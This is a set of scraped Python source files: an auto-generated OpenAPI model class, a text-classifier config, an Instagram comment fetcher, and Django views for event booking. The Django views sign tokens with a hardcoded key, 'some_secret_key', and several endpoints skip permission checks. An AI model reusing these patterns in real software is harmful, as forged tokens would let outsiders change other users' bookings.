# noqa: E501\n\n The version of the OpenAPI document: v1\n Contact: support@bimdata.io\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom bimdata_api_client.configuration import Configuration\n\n\nclass Topic(object):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n openapi_types = {\n 'guid': 'str',\n 'topic_type': 'str',\n 'topic_status': 'str',\n 'title': 'str',\n 'priority': 'str',\n 'labels': 'list[str]',\n 'creation_date': 'datetime',\n 'creation_author': 'str',\n 'modified_date': 'datetime',\n 'modified_author': 'str',\n 'assigned_to': 'str',\n 'reference_links': 'list[str]',\n 'stage': 'str',\n 'description': 'str',\n 'due_date': 'datetime',\n 'ifcs': 'list[int]',\n 'format': 'str',\n 'index': 'int',\n 'project': 'int'\n }\n\n attribute_map = {\n 'guid': 'guid',\n 'topic_type': 'topic_type',\n 'topic_status': 'topic_status',\n 'title': 'title',\n 'priority': 'priority',\n 'labels': 'labels',\n 'creation_date': 'creation_date',\n 'creation_author': 'creation_author',\n 'modified_date': 'modified_date',\n 'modified_author': 'modified_author',\n 'assigned_to': 'assigned_to',\n 'reference_links': 'reference_links',\n 'stage': 'stage',\n 'description': 'description',\n 'due_date': 'due_date',\n 'ifcs': 'ifcs',\n 'format': 'format',\n 'index': 'index',\n 'project': 'project'\n }\n\n def __init__(self, guid=None, topic_type=None, topic_status=None, title=None, priority=None, labels=None, creation_date=None, creation_author=None, modified_date=None, modified_author=None, assigned_to=None, reference_links=None, stage=None, description=None, due_date=None, ifcs=None, format=None, index=None, project=None, local_vars_configuration=None): # noqa: E501\n \"\"\"Topic - a model defined in OpenAPI\"\"\" # noqa: E501\n if local_vars_configuration is None:\n local_vars_configuration = Configuration()\n self.local_vars_configuration = local_vars_configuration\n\n self._guid = None\n self._topic_type = None\n self._topic_status = None\n self._title = None\n self._priority = None\n self._labels = None\n self._creation_date = None\n self._creation_author = None\n self._modified_date = None\n self._modified_author = None\n self._assigned_to = None\n self._reference_links = None\n self._stage = None\n self._description = None\n self._due_date = None\n self._ifcs = None\n self._format = None\n self._index = None\n self._project = None\n self.discriminator = None\n\n if guid is not None:\n self.guid = guid\n self.topic_type = topic_type\n self.topic_status = topic_status\n self.title = title\n self.priority = priority\n self.labels = labels\n if creation_date is not None:\n self.creation_date = creation_date\n self.creation_author = creation_author\n if modified_date is not None:\n self.modified_date = modified_date\n self.modified_author = modified_author\n self.assigned_to = assigned_to\n self.reference_links = reference_links\n self.stage = stage\n self.description = description\n self.due_date = due_date\n if ifcs is not None:\n self.ifcs = ifcs\n if format is not None:\n self.format = format\n self.index = index\n self.project = project\n\n @property\n def guid(self):\n \"\"\"Gets the guid of this Topic. 
# noqa: E501\n\n\n :return: The guid of this Topic. # noqa: E501\n :rtype: str\n \"\"\"\n return self._guid\n\n @guid.setter\n def guid(self, guid):\n \"\"\"Sets the guid of this Topic.\n\n\n :param guid: The guid of this Topic. # noqa: E501\n :type: str\n \"\"\"\n\n self._guid = guid\n\n @property\n def topic_type(self):\n \"\"\"Gets the topic_type of this Topic. # noqa: E501\n\n\n :return: The topic_type of this Topic. # noqa: E501\n :rtype: str\n \"\"\"\n return self._topic_type\n\n @topic_type.setter\n def topic_type(self, topic_type):\n \"\"\"Sets the topic_type of this Topic.\n\n\n :param topic_type: The topic_type of this Topic. # noqa: E501\n :type: str\n \"\"\"\n\n self._topic_type = topic_type\n\n @property\n def topic_status(self):\n \"\"\"Gets the topic_status of this Topic. # noqa: E501\n\n\n :return: The topic_status of this Topic. # noqa: E501\n :rtype: str\n \"\"\"\n return self._topic_status\n\n @topic_status.setter\n def topic_status(self, topic_status):\n \"\"\"Sets the topic_status of this Topic.\n\n\n :param topic_status: The topic_status of this Topic. # noqa: E501\n :type: str\n \"\"\"\n\n self._topic_status = topic_status\n\n @property\n def title(self):\n \"\"\"Gets the title of this Topic. # noqa: E501\n\n\n :return: The title of this Topic. # noqa: E501\n :rtype: str\n \"\"\"\n return self._title\n\n @title.setter\n def title(self, title):\n \"\"\"Sets the title of this Topic.\n\n\n :param title: The title of this Topic. # noqa: E501\n :type: str\n \"\"\"\n if self.local_vars_configuration.client_side_validation and title is None: # noqa: E501\n raise ValueError(\"Invalid value for `title`, must not be `None`\") # noqa: E501\n if (self.local_vars_configuration.client_side_validation and\n title is not None and len(title) < 1):\n raise ValueError(\"Invalid value for `title`, length must be greater than or equal to `1`\") # noqa: E501\n\n self._title = title\n\n @property\n def priority(self):\n \"\"\"Gets the priority of this Topic. # noqa: E501\n\n\n :return: The priority of this Topic. # noqa: E501\n :rtype: str\n \"\"\"\n return self._priority\n\n @priority.setter\n def priority(self, priority):\n \"\"\"Sets the priority of this Topic.\n\n\n :param priority: The priority of this Topic. # noqa: E501\n :type: str\n \"\"\"\n\n self._priority = priority\n\n @property\n def labels(self):\n \"\"\"Gets the labels of this Topic. # noqa: E501\n\n\n :return: The labels of this Topic. # noqa: E501\n :rtype: list[str]\n \"\"\"\n return self._labels\n\n @labels.setter\n def labels(self, labels):\n \"\"\"Sets the labels of this Topic.\n\n\n :param labels: The labels of this Topic. # noqa: E501\n :type: list[str]\n \"\"\"\n\n self._labels = labels\n\n @property\n def creation_date(self):\n \"\"\"Gets the creation_date of this Topic. # noqa: E501\n\n\n :return: The creation_date of this Topic. # noqa: E501\n :rtype: datetime\n \"\"\"\n return self._creation_date\n\n @creation_date.setter\n def creation_date(self, creation_date):\n \"\"\"Sets the creation_date of this Topic.\n\n\n :param creation_date: The creation_date of this Topic. # noqa: E501\n :type: datetime\n \"\"\"\n\n self._creation_date = creation_date\n\n @property\n def creation_author(self):\n \"\"\"Gets the creation_author of this Topic. # noqa: E501\n\n\n :return: The creation_author of this Topic. 
# noqa: E501\n :rtype: str\n \"\"\"\n return self._creation_author\n\n @creation_author.setter\n def creation_author(self, creation_author):\n \"\"\"Sets the creation_author of this Topic.\n\n\n :param creation_author: The creation_author of this Topic. # noqa: E501\n :type: str\n \"\"\"\n if (self.local_vars_configuration.client_side_validation and\n creation_author is not None and len(creation_author) > 254):\n raise ValueError(\"Invalid value for `creation_author`, length must be less than or equal to `254`\") # noqa: E501\n\n self._creation_author = creation_author\n\n @property\n def modified_date(self):\n \"\"\"Gets the modified_date of this Topic. # noqa: E501\n\n\n :return: The modified_date of this Topic. # noqa: E501\n :rtype: datetime\n \"\"\"\n return self._modified_date\n\n @modified_date.setter\n def modified_date(self, modified_date):\n \"\"\"Sets the modified_date of this Topic.\n\n\n :param modified_date: The modified_date of this Topic. # noqa: E501\n :type: datetime\n \"\"\"\n\n self._modified_date = modified_date\n\n @property\n def modified_author(self):\n \"\"\"Gets the modified_author of this Topic. # noqa: E501\n\n\n :return: The modified_author of this Topic. # noqa: E501\n :rtype: str\n \"\"\"\n return self._modified_author\n\n @modified_author.setter\n def modified_author(self, modified_author):\n \"\"\"Sets the modified_author of this Topic.\n\n\n :param modified_author: The modified_author of this Topic. # noqa: E501\n :type: str\n \"\"\"\n if (self.local_vars_configuration.client_side_validation and\n modified_author is not None and len(modified_author) > 254):\n raise ValueError(\"Invalid value for `modified_author`, length must be less than or equal to `254`\") # noqa: E501\n\n self._modified_author = modified_author\n\n @property\n def assigned_to(self):\n \"\"\"Gets the assigned_to of this Topic. # noqa: E501\n\n\n :return: The assigned_to of this Topic. # noqa: E501\n :rtype: str\n \"\"\"\n return self._assigned_to\n\n @assigned_to.setter\n def assigned_to(self, assigned_to):\n \"\"\"Sets the assigned_to of this Topic.\n\n\n :param assigned_to: The assigned_to of this Topic. # noqa: E501\n :type: str\n \"\"\"\n if (self.local_vars_configuration.client_side_validation and\n assigned_to is not None and len(assigned_to) > 254):\n raise ValueError(\"Invalid value for `assigned_to`, length must be less than or equal to `254`\") # noqa: E501\n\n self._assigned_to = assigned_to\n\n @property\n def reference_links(self):\n \"\"\"Gets the reference_links of this Topic. # noqa: E501\n\n\n :return: The reference_links of this Topic. # noqa: E501\n :rtype: list[str]\n \"\"\"\n return self._reference_links\n\n @reference_links.setter\n def reference_links(self, reference_links):\n \"\"\"Sets the reference_links of this Topic.\n\n\n :param reference_links: The reference_links of this Topic. # noqa: E501\n :type: list[str]\n \"\"\"\n\n self._reference_links = reference_links\n\n @property\n def stage(self):\n \"\"\"Gets the stage of this Topic. # noqa: E501\n\n\n :return: The stage of this Topic. # noqa: E501\n :rtype: str\n \"\"\"\n return self._stage\n\n @stage.setter\n def stage(self, stage):\n \"\"\"Sets the stage of this Topic.\n\n\n :param stage: The stage of this Topic. # noqa: E501\n :type: str\n \"\"\"\n\n self._stage = stage\n\n @property\n def description(self):\n \"\"\"Gets the description of this Topic. # noqa: E501\n\n\n :return: The description of this Topic. 
# noqa: E501\n :rtype: str\n \"\"\"\n return self._description\n\n @description.setter\n def description(self, description):\n \"\"\"Sets the description of this Topic.\n\n\n :param description: The description of this Topic. # noqa: E501\n :type: str\n \"\"\"\n\n self._description = description\n\n @property\n def due_date(self):\n \"\"\"Gets the due_date of this Topic. # noqa: E501\n\n\n :return: The due_date of this Topic. # noqa: E501\n :rtype: datetime\n \"\"\"\n return self._due_date\n\n @due_date.setter\n def due_date(self, due_date):\n \"\"\"Sets the due_date of this Topic.\n\n\n :param due_date: The due_date of this Topic. # noqa: E501\n :type: datetime\n \"\"\"\n\n self._due_date = due_date\n\n @property\n def ifcs(self):\n \"\"\"Gets the ifcs of this Topic. # noqa: E501\n\n\n :return: The ifcs of this Topic. # noqa: E501\n :rtype: list[int]\n \"\"\"\n return self._ifcs\n\n @ifcs.setter\n def ifcs(self, ifcs):\n \"\"\"Sets the ifcs of this Topic.\n\n\n :param ifcs: The ifcs of this Topic. # noqa: E501\n :type: list[int]\n \"\"\"\n\n self._ifcs = ifcs\n\n @property\n def format(self):\n \"\"\"Gets the format of this Topic. # noqa: E501\n\n\n :return: The format of this Topic. # noqa: E501\n :rtype: str\n \"\"\"\n return self._format\n\n @format.setter\n def format(self, format):\n \"\"\"Sets the format of this Topic.\n\n\n :param format: The format of this Topic. # noqa: E501\n :type: str\n \"\"\"\n if (self.local_vars_configuration.client_side_validation and\n format is not None and len(format) > 64):\n raise ValueError(\"Invalid value for `format`, length must be less than or equal to `64`\") # noqa: E501\n if (self.local_vars_configuration.client_side_validation and\n format is not None and len(format) < 1):\n raise ValueError(\"Invalid value for `format`, length must be greater than or equal to `1`\") # noqa: E501\n\n self._format = format\n\n @property\n def index(self):\n \"\"\"Gets the index of this Topic. # noqa: E501\n\n\n :return: The index of this Topic. # noqa: E501\n :rtype: int\n \"\"\"\n return self._index\n\n @index.setter\n def index(self, index):\n \"\"\"Sets the index of this Topic.\n\n\n :param index: The index of this Topic. # noqa: E501\n :type: int\n \"\"\"\n if (self.local_vars_configuration.client_side_validation and\n index is not None and index > 2147483647): # noqa: E501\n raise ValueError(\"Invalid value for `index`, must be a value less than or equal to `2147483647`\") # noqa: E501\n if (self.local_vars_configuration.client_side_validation and\n index is not None and index < 0): # noqa: E501\n raise ValueError(\"Invalid value for `index`, must be a value greater than or equal to `0`\") # noqa: E501\n\n self._index = index\n\n @property\n def project(self):\n \"\"\"Gets the project of this Topic. # noqa: E501\n\n\n :return: The project of this Topic. # noqa: E501\n :rtype: int\n \"\"\"\n return self._project\n\n @project.setter\n def project(self, project):\n \"\"\"Sets the project of this Topic.\n\n\n :param project: The project of this Topic. 
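# ---------------------------------------------------------------------------
# Editor's sketch (not part of the generated topic.py): the setters above run
# client-side validation, so invalid values fail fast at assignment time.
# Assuming the bimdata_api_client package is installed:
#
#   from bimdata_api_client.models.topic import Topic
#
#   topic = Topic(title='Leaky pipe on level 2', project=12)
#   print(topic.to_dict()['title'])   # 'Leaky pipe on level 2'
#
#   try:
#       topic.title = ''              # violates the length >= 1 rule
#   except ValueError as err:
#       print(err)
# ---------------------------------------------------------------------------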
# noqa: E501\n :type: int\n \"\"\"\n if self.local_vars_configuration.client_side_validation and project is None: # noqa: E501\n raise ValueError(\"Invalid value for `project`, must not be `None`\") # noqa: E501\n\n self._project = project\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, Topic):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, Topic):\n return True\n\n return self.to_dict() != other.to_dict()\n","sub_path":"bimdata_api_client/models/topic.py","file_name":"topic.py","file_ext":"py","file_size_in_byte":17144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"589691132","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author:XuMing(xuming624@qq.com)\n@description:\n\"\"\"\n\nimport os\n\npwd_path = os.path.abspath(os.path.dirname(__file__))\n\ntrain_path = os.path.join(pwd_path, \"data/train.txt\")\ntest_path = os.path.join(pwd_path, \"data/test.txt\")\n# run preprocess.py to segment train and test data\ntrain_seg_path = os.path.join(pwd_path, \"../examples/train_seg_sample.txt\") # segment of train file\ntest_seg_path = os.path.join(pwd_path, \"../examples/test_seg_sample.txt\") # segment of test file\n\ncol_sep = '\\t' # separate label and content of train data\n\n# one of \"logistic_regression, random_forest, bayes, decision_tree, svm, knn, xgboost, xgboost_lr,\n# fasttext, cnn, rnn, han\"\nmodel_type = \"logistic_regression\"\n\n# feature type\n# classic text classification usage: one of \"tfidf_char, tfidf_word, tf_word\",\n# deep text classification usage: cnn/rnn/fasttext is \"vectorize\"\nfeature_type = 'tfidf_word'\n\ndebug = True\n# default params\nsentence_symbol_path = os.path.join(pwd_path, 'data/sentence_symbol.txt')\nstop_words_path = os.path.join(pwd_path, 'data/stopwords.txt')\n\noutput_dir = os.path.join(pwd_path, \"../examples\") # output dir\nif not os.path.exists(output_dir):\n os.makedirs(output_dir)\nword_vocab_path = os.path.join(output_dir, \"vocab_{}_{}.txt\".format(feature_type, model_type)) # vocab path\nlabel_vocab_path = os.path.join(output_dir, \"label_{}_{}.txt\".format(feature_type, model_type)) # label path\npr_figure_path = os.path.join(output_dir, \"R_P_{}_{}.png\".format(feature_type, model_type)) # precision recall figure\nfeature_vec_path = os.path.join(output_dir, \"feature_{}.pkl\".format(feature_type)) # vector path\nmodel_save_path = os.path.join(output_dir, \"model_{}_{}.pkl\".format(feature_type, model_type)) # save model path\nlr_feature_weight_path = os.path.join(output_dir, \"lr_feature_weight.txt\")\n# 
predict\npred_save_path = os.path.join(output_dir, \"pred_result_{}_{}.txt\".format(feature_type, model_type))\n\n# --- deep model for train ---\nmax_len = 300 # max len words of sentence\nmin_count = 1 # word will not be added to dictionary if it's frequency is less than min_count\nbatch_size = 64\nnb_epoch = 10\nembedding_dim = 128\nhidden_dim = 128\ndropout = 0.5\n","sub_path":"pytextclassifier/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"641659294","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom InstagramAPI import InstagramAPI\nimport time\nfrom datetime import datetime\nimport json\nimport datetime\nfrom user_handler import getAge, getGender\nimport _pickle as pickle\nfrom naive_bayes import naive_bayes\nfrom statistics import mode\n\nall_comments = []\n\ndef classify_nb(comments):\n\n result = []\n for text in comments:\n result.append(naive_bayes.naive_bayes_classify_from_text(naive_bayes.load_model(),text))\n return mode(result)\n\ndef getComments(API, media_id):\n \n if(not media_id): \n print(\"media_id not found\")\n return False\n\n print(\"getting comments\")\n\n has_more_comments = True\n max_id = ''\n\n flag = True\n\n while has_more_comments and flag:\n _ = API.getMediaComments(media_id, max_id=max_id)\n # comments' page come from older to newer, lets preserve desc order in full list\n try:\n for c in reversed(API.LastJson['comments']):\n all_comments.append(c)\n if len(all_comments) > 500:\n flag = False\n \n except:\n print(API.LastJson)\n \n has_more_comments = API.LastJson.get('has_more_comments', False)\n \n if has_more_comments:\n max_id = API.LastJson.get('next_max_id', '')\n time.sleep(1)\n\n\n print(\"number of comments: \" +str(len(all_comments)))\n\n return(all_comments)\n\n","sub_path":"data_collector/get_comments.py","file_name":"get_comments.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"624940231","text":"from itsdangerous import URLSafeSerializer, BadData\nfrom django.http import JsonResponse, HttpResponse\nfrom django.urls import reverse\nfrom users.models import CustomUser\nfrom django.db.models import Q\nfrom functools import reduce\nfrom operator import __or__ as OR\n\nfrom time import strftime\nimport locale\nfrom plateformeweb.models import Event, Organization, OrganizationPerson, Place\nfrom urllib.parse import parse_qs\nfrom django.utils import timezone\nimport datetime\nfrom django.db.models.signals import post_save\nfrom actstream import action\nfrom actstream.actions import follow, unfollow\n\nfrom django.template.loader import render_to_string\nfrom actstream.models import actor_stream\n\nfrom plateformeweb.views import send_notification\n\nfrom post_office import mail\nfrom django.core.mail import send_mail\nfrom django.utils.timezone import now\n\n\n### mailers ###\ndef cancel_reservation(request, token):\n s = URLSafeSerializer('some_secret_key', salt='cancel_reservation')\n ret = s.loads(token)\n event_id = ret['event_id']\n user_id = ret['user_id']\n event = Event.objects.get(pk=event_id)\n user = CustomUser.objects.get(pk=user_id)\n context = {'event': event, 'user': user}\n attendees = event.attendees.all()\n if user in attendees:\n event.attendees.remove(user)\n event.available_seats += 1\n event.save()\n return render(request, 'mail/cancel_ok.html', context)\n else:\n return 
render(request, 'mail/cancel_failed.html', context)\n\ndef send_booking_mail(request, user, event):\n user_id = user.id\n event_id = event.id\n\n serial = URLSafeSerializer('some_secret_key',\n salt='cancel_reservation')\n data = {'event_id': event_id, 'user_id': user_id}\n\n cancel_token = serial.dumps(data)\n cancel_url = reverse('cancel_reservation', args=[cancel_token])\n cancel_url = request.build_absolute_uri(cancel_url)\n\n event_url = reverse('event_detail', args=[event_id, event.slug])\n event_url = request.build_absolute_uri(event_url)\n\n params = {'cancel_url': cancel_url,\n 'event_url': event_url,\n 'event': event}\n\n msg_plain = render_to_string('mail/relance.html',\n params)\n msg_html = render_to_string('mail/relance.html',\n params)\n\n date = event.starts_at.date().strftime(\"%d %B\")\n location = event.location.name\n subject = \"Votre réservation pour le \" + date + \" à \" + location\n\n mail.send(\n [user.email],\n 'no-reply@atelier-soude.fr',\n subject=subject,\n message=msg_plain,\n html_message=msg_html\n )\n\n\n### event ###\ndef delete_event(request):\n if request.method != 'POST':\n # TODO change this\n return HttpResponse(\"Circulez, il n'y a rien à voir\")\n else:\n request_body = request.body.decode(\"utf-8\")\n post_data = parse_qs(request_body)\n\n event_id = post_data['event_id'][0]\n event = Event.objects.get(pk=event_id)\n person = CustomUser.objects.get(email=request.user)\n if person in event.organizers.all():\n action.send(request.user, verb=\"a supprimé\", target=event) \n event.delete()\n return JsonResponse({'status': \"OK\"})\n\n return JsonResponse({'status': -1})\n\n\n\ndef set_present(request):\n if request.method != 'POST':\n # TODO change this\n return HttpResponse(\"Circulez, il n'y a rien à voir\")\n else:\n serial = URLSafeSerializer('some_secret_key',\n salt='presence')\n\n data = serial.loads(request.POST['idents'])\n event_id = data['event_id']\n user_id = data['user_id']\n\n person = CustomUser.objects.get(pk=user_id)\n event = Event.objects.get(pk=event_id)\n event.attendees.remove(person)\n event.presents.add(person)\n action.send(request.user, verb=\"a validé la présence de\", action_object=person, target=event) \n\n return JsonResponse({'status': \"OK\", 'user_id': user_id})\n\ndef set_absent(request):\n if request.method != 'POST':\n # TODO change this\n return HttpResponse(\"Circulez, il n'y a rien à voir\")\n else:\n serial = URLSafeSerializer('some_secret_key',\n salt='presence')\n\n data = serial.loads(request.POST['idents'])\n event_id = data['event_id']\n user_id = data['user_id']\n\n person = CustomUser.objects.get(pk=user_id)\n event = Event.objects.get(pk=event_id)\n event.presents.remove(person)\n event.attendees.add(person)\n action.send(request.user, verb=\"a dé-validé la présence de\", action_object=person, target=event) \n\n return JsonResponse({'status': \"OK\", 'user_id': user_id})\n\ndef get_organizations(request):\n if request.method != 'POST':\n # TODO change this\n return HttpResponse(\"Circulez, il n'y a rien à voir\")\n else:\n person = CustomUser.objects.get(email=request.user)\n organizations = OrganizationPerson.objects.filter(user=request.user)\n volunteer_of = {}\n for person in organizations:\n if person.role >= OrganizationPerson.VOLUNTEER:\n volunteer_of[person.organization.pk] = person.organization.name\n\n return JsonResponse({'status': \"OK\", \"organizations\": volunteer_of})\n\ndef get_all_places(request):\n if request.method != 'GET':\n # TODO change this\n return HttpResponse(\"Circulez, il 
n'y a rien à voir\")\n else:\n places = {}\n places_qs = Place.objects.all()\n for place in places_qs:\n place_slug = place.slug\n place_pk = place.pk\n organization = place.organization\n organization_detail_url = reverse('organization_detail',\n args=[organization.pk,\n organization.slug])\n\n place_detail_url = reverse('place_detail',\n args=[place_pk,\n place_slug])\n\n longitude = place.address.longitude\n latitude = place.address.latitude\n\n places[place_pk] = {\n 'pk': place_pk,\n 'name': place.name,\n 'place_detail_url': place_detail_url,\n \"address\": place.address.formatted,\n 'type': place.type.name,\n 'organization': place.organization.name,\n 'organization_url': organization_detail_url,\n 'latitude': latitude,\n 'longitude': longitude,\n 'picture': place.picture.url,\n 'description': place.description[:250],\n }\n\n return JsonResponse({'status': \"OK\", \"places\": places})\n\ndef get_places_for_organization(request):\n if request.method != 'POST':\n # TODO change this\n return HttpResponse(\"Circulez, il n'y a rien à voir\")\n else:\n places = {}\n organization_pk = request.POST['organization_id']\n organization = Organization.objects.get(pk=organization_pk)\n places_qs = Place.objects.filter(organization=organization)\n for place in places_qs:\n places[place.pk] = str(place)\n\n return JsonResponse({'status': \"OK\", \"places\": places})\n\ndef get_dates(request):\n if request.method != 'POST':\n # TODO change this\n return HttpResponse(\"Circulez, il n'y a rien à voir\")\n else:\n events = {}\n request_body = request.body.decode(\"utf-8\")\n post_data = parse_qs(request_body)\n organization_pk = int(post_data['organization_pk'][0])\n today = timezone.now()\n\n target_organization = Organization.objects.get(pk=organization_pk)\n all_future_events = Event.objects.filter(organization=target_organization, starts_at__gte=today)\n\n for event in all_future_events:\n events[event.pk] = {'title': event.title,\n 'formatted_date': event.date_interval_format(),\n 'timestamp': event.starts_at.timestamp()}\n\n return JsonResponse({'status': \"OK\", \"dates\": events})\n\n\ndef list_events_in_context(request, context_pk=None, context_type=None, context_user=None, context_place=None, context_org=None ):\n if request.method != 'GET':\n # TODO change this\n return HttpResponse(\"Circulez, il n'y a rien à voir\")\n else:\n events = []\n organizations = {}\n places = {}\n activitys = {}\n today = timezone.now()\n\n if context_place:\n this_place = Place.objects.get(pk=context_pk)\n all_future_events = Event.objects.filter(\n location=this_place, \n starts_at__gte=today, \n published=True).order_by('starts_at')\n \n elif context_org:\n this_organization = Organization.objects.get(pk=context_pk)\n all_future_events = Event.objects.filter(\n organization=this_organization, \n starts_at__gte=today, \n published=True).order_by('starts_at')\n \n elif context_user:\n lst = [Q(attendees__pk=context_pk) , Q(presents__pk=context_pk) , Q(organizers__pk=context_pk)]\n all_future_events = Event.objects.filter(reduce(OR, lst)).filter(\n starts_at__gte=today, \n published=True).order_by('starts_at')\n\n else:\n all_future_events = Event.objects.filter(\n starts_at__gte=today, \n published=True).order_by('starts_at')\n\n\n locale.setlocale(locale.LC_ALL, 'fr_FR')\n\n for event in all_future_events:\n event_pk = event.pk\n event_slug = event.slug\n event_detail_url = reverse('event_detail', args=[event_pk, event_slug])\n event_start_timestamp = event.starts_at.timestamp() * 1000\n organization = 
event.organization\n place = event.location\n activity = event.type\n\n if organization.pk not in organizations:\n organization_slug = organization.slug\n organization_pk = organization.pk\n organization_detail_url = reverse('organization_detail',\n args=[organization_pk,\n organization_slug])\n organizations[organization_pk] = {\n 'pk': organization_pk,\n 'name': organization.name,\n 'slug': organization_slug,\n 'organization_detail_url': organization_detail_url,\n }\n \n if place.pk not in places:\n place_slug = place.slug\n place_pk = place.pk\n place_detail_url = reverse('place_detail',\n args=[place_pk,\n place_slug])\n places[place_pk] = {\n 'pk': place_pk,\n 'name': place.name,\n 'truncated_name': place.name[0:25],\n 'slug': place_slug,\n 'place_detail_url': place_detail_url,\n }\n\n if activity.pk not in activitys:\n activity_slug = activity.slug\n activity_pk = activity.pk\n activity_detail_url = reverse('activity_detail',\n args=[activity_pk,\n activity_slug])\n activitys[activity_pk] = {\n 'pk': activity_pk,\n 'name': activity.name,\n 'truncated_name': activity.name[0:25],\n 'slug': activity_slug,\n 'activity_detail_url': activity_detail_url,\n }\n\n events += [{\n 'pk': event.pk,\n 'title': event.title,\n 'slug': event_slug,\n 'available_seats': event.available_seats,\n 'type_picture_url': event.type.picture.url,\n 'event_detail_url': event_detail_url,\n 'book_url': reverse('booking_form', args=[event_pk]),\n 'edit_url': reverse('event_edit', args=[event_pk]),\n 'organization_pk': organization.pk,\n 'place_pk': event.location.pk,\n 'type_pk': event.type.pk,\n 'published': event.published,\n 'starts_at': event.starts_at.strftime(\"%H:%M\"),\n 'ends_at': event.ends_at.strftime(\"%H:%M\"),\n 'start_timestamp': event_start_timestamp,\n 'user_in_attendees': request.user in event.attendees.all(),\n 'user_in_presents': request.user in event.presents.all(),\n 'user_in_organizers': request.user in event.organizers.all(),\n 'day_month_str': event.starts_at.strftime(\"%d %B\"),\n }]\n\n return JsonResponse({'status': \"OK\", \"dates\": events, \"organizations\": organizations, \"places\": places, \"activities\": activitys, })\n\ndef book_event(request):\n if request.method != 'POST':\n # TODO change this\n return HttpResponse(\"Circulez, il n'y a rien à voir\")\n else:\n request_body = request.body.decode(\"utf-8\")\n post_data = parse_qs(request_body)\n event_id = post_data['event_id'][0]\n user = CustomUser.objects.get(email=request.user.email)\n event = Event.objects.get(pk=event_id)\n organization = event.organization\n attendees = event.attendees.all()\n\n user_volunteer_orgs = OrganizationPerson.objects.filter(user=user,\n role__gte=OrganizationPerson.VOLUNTEER)\n\n\n if user in attendees:\n if organization not in user_volunteer_orgs:\n event.available_seats += 1\n event.attendees.remove(user)\n action.send(user, verb=\"s'est désinscrit de\", target=event) \n event.save()\n return JsonResponse({'status': 'unbook',\n 'available_seats': event.available_seats})\n else:\n if event.available_seats >= 0:\n if organization not in user_volunteer_orgs:\n event.available_seats -= 1 \n action.send(user, verb=\"s'est inscrit à\", target=event) \n follow(user, event, actor_only=False)\n event.attendees.add(user)\n # send booking mail here or notification here\n send_booking_mail(request, user, event)\n #send_notification(request, user)\n \n else:\n return JsonResponse({'status': -1})\n\n event.save()\n return JsonResponse({'status': 'unbook',\n 'available_seats': event.available_seats})\n\ndef 
list_users(request, organization_pk, event_pk):\n    if request.method != 'GET':\n        # TODO change this\n        return HttpResponse(\"Circulez, il n'y a rien à voir\")\n    else:\n        user = CustomUser.objects.get(email=request.user.email)\n        organization = Organization.objects.get(pk=organization_pk)\n        # use filter().exists() so a non-admin yields False instead of raising DoesNotExist\n        user_is_admin = OrganizationPerson.objects.filter(user=user, organization=organization, role__gte=OrganizationPerson.ADMIN).exists()\n        if not user_is_admin:\n            return JsonResponse({'status': -1})\n\n        users = OrganizationPerson.objects.filter(organization=organization)\n        event = Event.objects.get(pk=event_pk)\n        every_attendee = event.attendees.all() | event.presents.all() | event.organizers.all()\n        users_dict = []\n        for user in users:\n            if user.user not in every_attendee:\n                new_user = {\n                    'pk': user.user.pk,\n                    'name': user.user.get_full_name(),\n                    'email': user.user.email,\n                    'role': user.role,\n                }\n                users_dict += [new_user]\n        return JsonResponse({'status': \"OK\",\n                             'users': users_dict})\n\ndef add_users(request):\n    if request.method != 'POST':\n        # TODO change this\n        return HttpResponse(\"Circulez, il n'y a rien à voir\")\n    else:\n        request_body = request.body.decode(\"utf-8\")\n        post_data = parse_qs(request_body)\n        event_pk = post_data['event_pk'][0]\n        user_list = post_data['user_list'][0].split(',')\n        event = Event.objects.get(pk=event_pk)\n        every_attendee = event.attendees.all() | event.presents.all() | event.organizers.all()\n        seats = event.available_seats\n        presents_pk = []\n        attending_pk = []\n\n        for user_pk in user_list:\n            user = CustomUser.objects.get(pk=user_pk)\n            now = timezone.now()\n\n            if event.starts_at <= now:\n                # the event already started: count the user as present\n                event.presents.add(user)\n                presents_pk += [user.pk]\n            else:\n                if user not in every_attendee:\n                    seats -= 1\n                    event.attendees.add(user)\n                    attending_pk += [user.pk]\n                    action.send(request.user, verb=\"a inscrit\", action_object=user, target=event)\n                else:\n                    event.presents.add(user)\n                    presents_pk += [user.pk]\n\n        event.available_seats = seats\n        event.save()\n        return JsonResponse({'status': 'OK',\n                             'seats': seats,\n                             'presents_pk': presents_pk,\n                             'attending_pk': attending_pk})\n","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":17872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
